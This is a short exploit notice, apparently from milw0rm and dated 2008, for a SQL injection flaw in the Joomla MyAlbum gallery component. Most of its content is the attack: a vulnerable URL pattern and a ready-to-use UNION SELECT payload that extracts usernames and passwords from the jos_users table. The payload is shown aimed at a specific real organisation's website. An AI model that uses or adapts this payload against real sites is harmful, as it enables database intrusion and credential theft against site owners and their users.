------------------------------------------------------------------------------------------------- # Title : Joomla Component MyAlbum SQL Injection Vulnerability # Author : parad0x # D.Page : http://joomlacode.org/gf/project/myalbum/ ------------------------------------------------------------------------------------------------- http://[target]/index.php?option=com_myalbum&album=[SQL] ------------------------------------------------------------------------------------------------- Example: http://www.akparti.org.tr/disiliskiler/index.php?option=com_myalbum&album=-1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/* ------------------------------------------------------------------------------------------------- greetz : VoLqaN ------------------------------------------------------------------------------------------------- http://inso.host.sk side note: myalbum 01.06.2007 Hüseyin Bora ABACI GNU/GPL borkurt@hotmail.com www.joomla.org 1.0 MyAlbum is practical,comfortable,fast simple a picture gallery component. # milw0rm.com [2008-03-28]